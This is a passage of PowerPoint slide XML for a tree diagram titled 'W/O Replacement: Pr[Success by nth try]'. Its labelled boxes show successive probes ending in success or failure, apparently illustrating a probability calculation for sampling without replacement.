          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>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516206413"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="2737"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="2737"/>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28600" y="5410200"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Probe 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="6172200"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5600700"/>
            <a:ext cx="838200" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="5867400"/>
            <a:ext cx="393700" cy="584200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1447800" y="4267200"/>
            <a:ext cx="1828800" cy="1333500"/>
            <a:chOff x="1447800" y="4267200"/>
            <a:chExt cx="1828800" cy="1333500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="5" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1447800" y="4724400"/>
              <a:ext cx="1143000" cy="876300"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2057400" y="4267200"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Fail, Probe 2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130300" y="4749800"/>
            <a:ext cx="715347" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2667000" y="4648200"/>
            <a:ext cx="1981200" cy="914400"/>
            <a:chOff x="2667000" y="4648200"/>
            <a:chExt cx="1981200" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3429000" y="5181600"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Success</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667000" y="4648200"/>
              <a:ext cx="838200" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="3429000"/>
            <a:ext cx="751114" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="latex-image-1.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="5029200"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2971800" y="2971800"/>
            <a:ext cx="2057400" cy="1333500"/>
            <a:chOff x="2971800" y="2971800"/>
            <a:chExt cx="2057400" cy="1333500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2971800" y="3429000"/>
              <a:ext cx="1143000" cy="876300"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810000" y="2971800"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Fail, Probe 3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3886200" y="1143000"/>
            <a:ext cx="4191000" cy="3124200"/>
            <a:chOff x="3886200" y="1143000"/>
            <a:chExt cx="4191000" cy="3124200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5791200" y="1752600"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Fail, Probe 4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6858000" y="2743200"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Success</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6096000" y="2209800"/>
              <a:ext cx="838200" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="6248400" y="1143000"/>
              <a:ext cx="914400" cy="647700"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDash"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="Picture 27" descr="latex-image-1.pdf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5791200" y="2438400"/>
              <a:ext cx="664368" cy="442912"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5257800" y="3886200"/>
              <a:ext cx="1219200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
                <a:t>Success</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="3352800"/>
              <a:ext cx="838200" cy="571500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4572000" y="2133600"/>
              <a:ext cx="1143000" cy="876300"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="Picture 26" descr="latex-image-1.pdf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3886200" y="3657600"/>
              <a:ext cx="728663" cy="485775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Picture 28" descr="latex-image-1.pdf"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4343400" y="2057400"/>
              <a:ext cx="711200" cy="505055"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="474663" y="381000"/>
            <a:ext cx="8493125" cy="727075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="90488" tIns="44450" rIns="90488" bIns="44450" numCol="1" anchor="ctr" anchorCtr="1" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="88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mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>W/O Replacement:</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Pr[Success</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>nth try]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3733800" y="5029200"/>
            <a:ext cx="1828800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="009446"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Arrow Connector 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3200400" y="5562600"/>
            <a:ext cx="1600200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="009446"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2209800" y="6096000"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="009446"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="4343400"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>[Success by 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> try] =</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Pr</a:t>
            </a:r>
            <a:r>
